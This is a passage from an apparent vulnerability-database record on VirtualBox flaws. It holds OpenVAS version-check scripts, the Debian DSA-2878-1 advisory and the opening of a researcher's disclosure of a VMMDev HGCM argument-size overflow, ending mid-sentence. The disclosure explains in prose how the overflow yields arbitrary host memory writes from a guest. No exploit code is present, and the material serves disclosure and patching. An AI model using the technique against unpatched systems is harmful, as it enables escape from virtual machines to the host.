res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2017-08-01T10:48:45", "description": "Matthew Daley discovered multiple vulnerabilities in VirtualBox, a x86\nvirtualisation solution, resulting in denial of service, privilege\nescalation and an information leak.", "cvss3": {}, "published": "2014-03-13T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2878-1 (virtualbox - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0404", "CVE-2014-0406", "CVE-2014-0407", "CVE-2013-5892"], "modified": "2017-07-17T00:00:00", "id": "OPENVAS:702878", "href": "http://plugins.openvas.org/nasl.php?oid=702878", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2878.nasl 6735 2017-07-17 09:56:49Z teissa $\n# Auto-generated from advisory DSA 2878-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"virtualbox on Debian Linux\";\ntag_insight = \"VirtualBox is a free x86 virtualization solution allowing a wide range\nof x86 operating systems such as Windows, DOS, BSD or Linux to run on a\nLinux system.\";\ntag_solution = \"For the oldstable distribution (squeeze), these problems have been fixed in\nversion 3.2.10-dfsg-1+squeeze2 of the virtualbox-ose source package.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 4.1.18-dfsg-2+deb7u2.\n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 4.3.6-dfsg-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4.3.6-dfsg-1.\n\nWe recommend that you upgrade your virtualbox packages.\";\ntag_summary = \"Matthew Daley discovered multiple vulnerabilities in VirtualBox, a x86\nvirtualisation solution, resulting in denial of service, privilege\nescalation and an information leak.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702878);\n script_version(\"$Revision: 6735 $\");\n script_cve_id(\"CVE-2013-5892\", \"CVE-2014-0404\", \"CVE-2014-0406\", \"CVE-2014-0407\");\n script_name(\"Debian Security Advisory DSA 2878-1 (virtualbox - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-17 11:56:49 +0200 (Mon, 17 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-03-13 00:00:00 +0100 (Thu, 13 Mar 2014)\");\n script_tag(name: \"cvss_base\", value:\"3.5\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n\n script_xref(name: 
\"URL\", value: \"http://www.debian.org/security/2014/dsa-2878.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dbg\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dkms\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-fuse\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-dkms\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-source\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-utils\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-x11\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report 
+= res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-qt\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-source\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"virtualbox-ose-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose\", 
ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != 
NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += 
res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"virtualbox-ose-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-ose-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"virtualbox-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 3.5, "vector": "AV:LOCAL/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:45", "description": "Gentoo Linux Local Security Checks GLSA 201401-13", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201401-13", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0405", "CVE-2014-0404", "CVE-2014-0406", "CVE-2014-0407", "CVE-2013-5892", "CVE-2012-3221"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121110", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121110", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201401-13.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General 
Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121110\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:26:34 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201401-13\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Virtualbox. 
Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201401-13\");\n script_cve_id(\"CVE-2012-3221\", \"CVE-2013-5892\", \"CVE-2014-0404\", \"CVE-2014-0405\", \"CVE-2014-0406\", \"CVE-2014-0407\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201401-13\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-emulation/virtualbox\", unaffected: make_list(\"ge 4.2.22\"), vulnerable: make_list(\"lt 4.2.22\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-emulation/virtualbox-bin\", unaffected: make_list(\"ge 4.2.22\"), vulnerable: make_list(\"lt 4.2.22\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-21T23:18:59", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2878-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nMarch 13, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : virtualbox\nCVE ID : 
CVE-2013-5892 CVE-2014-0404 CVE-2014-0406 CVE-2014-0407\nDebian Bug : 735410\n\nMatthew Daley discovered multiple vulnerabilities in VirtualBox, a x86 \nvirtualisation solution, resulting in denial of service, privilege\nescalation and an information leak.\n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 3.2.10-dfsg-1+squeeze2 of the virtualbox-ose source package.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 4.1.18-dfsg-2+deb7u2.\n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 4.3.6-dfsg-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4.3.6-dfsg-1.\n\nWe recommend that you upgrade your virtualbox packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2014-03-13T15:31:43", "type": "debian", "title": "[SECURITY] [DSA 2878-1] virtualbox security update", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:L/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5892", "CVE-2014-0404", "CVE-2014-0406", "CVE-2014-0407"], "modified": "2014-03-13T15:31:43", "id": "DEBIAN:DSA-2878-1:66F21", "href": "https://lists.debian.org/debian-security-announce/2014/msg00049.html", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:50", 
"description": "\r\n\r\nHi there,\r\n\r\nRecently I found a few vulnerabilities in Oracle VM VirtualBox, the\r\nopen-source virtualization product. These have already been reported to the\r\nproject, fixed and disclosed in the form of the recent January 2014 Oracle\r\nCritical Patch Update (at\r\n<http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html>).\r\n\r\nThe purpose of this mail is simply to provide a few more specifics about each\r\nvulnerability to allow distributors, packagers and other users of the software\r\nto better classify them (and, of course, for the sake of freely sharing\r\ninformation!)\r\n\r\n(Most of the rest of this message is a hacked-up version of the initial\r\nprivate disclosure to Oracle; please excuse any messed-up tenses or similar.\r\nAlso, I've tried to clarify any VBox-specific terminology but it still might\r\nbe lacking in places.)\r\n\r\n\r\nThese vulnerabilities were tested on both 32-bit and 64-bit versions of\r\nVirtualBox, namely:\r\n32-bit: 4.2.16_Debianr86992 ((what was) the current Debian jessie\r\n VirtualBox package)\r\n64-bit: 4.2.51_OSEr47061 (compiled from SVN)\r\nThe SVN trunk at the time was also inspected to ensure fixes hadn't been made\r\nsince these versions.\r\n\r\nThe exploitability of some of the vulnerabilities depends on the architectural\r\nwidth of the host; where this is the case it is explicitly mentioned. When an\r\nexploitation attempt is performed on a host not of the correct width the\r\nattempt usually leads to DOS instead.\r\n\r\nThe first two vulnerabilities are in the VMMDev device's HGCM interface, the\r\nthird is in the Windows Guest Additions' Shared Folder driver and the final\r\ntwo are in the handling of other VMMDev request types.\r\n\r\n\r\n* Vuln. #1: VMMDev HGCM argument size overflow (CVE-2013-5892)\r\n\r\nThe first step in processing a HGCM (Host-Guest Communication Manager) call\r\nVMMDev request is to calculate the total size of the call's arguments. 
This is\r\nso the correct amount of space can be allocated for the arguments whose types\r\n(linear in/out addresses and page lists) need buffer space for transferring\r\nbetween guest and host memory. This calculation is performed using the\r\n"cbCmdSize" variable.\r\n\r\nThe problem lies in the fact that this calculation can easily overflow and\r\nhence the check afterward to see whether the amount of space required is too\r\nlarge or not will mistakenly pass. This leads to a\r\nsmaller-than-actually-required amount of memory being allocated for the\r\nhost-side VBOXHGCMCMD structure. This structure holds host-side HGCM call\r\ninformation including information on each argument (type, pointer to host\r\nbuffer space, size) and the buffers themselves. This is obviously an\r\nexploitable heap overflow, but we can do better.\r\n\r\nThe aforementioned host-side buffer pointers which are then assigned to the\r\narguments which need them can, via careful argument size choice, be led to\r\npoint to arbitrary host memory instead of within the third part of the\r\nVBOXHGCMCMD structure where they are supposed to point.\r\n\r\nNotably, one can craft the individual argument sizes so that the buffer\r\npointer placement routine wraps around the address space and sets the buffers\r\nto point to the head of the VBOXHGCMCMD structure, allowing one to cleanly\r\nwrite to the other parts of the structure, including the other argument types\r\nand host-side buffer pointers.\r\n\r\nUsing this, one can write to one of these host-side buffer pointers so that\r\nthe resulting HGCM call output for that argument is sent elsewhere in the\r\naddress space - a write-(almost-)what-where vulnerability of arbitrary length\r\nwhich is not affected by the heap/ASLR moving the HGCM structure around in\r\nmemory (since the method of exploitation uses distances relative to the head\r\nof the HGCM structure itself).\r\n\r\nThis 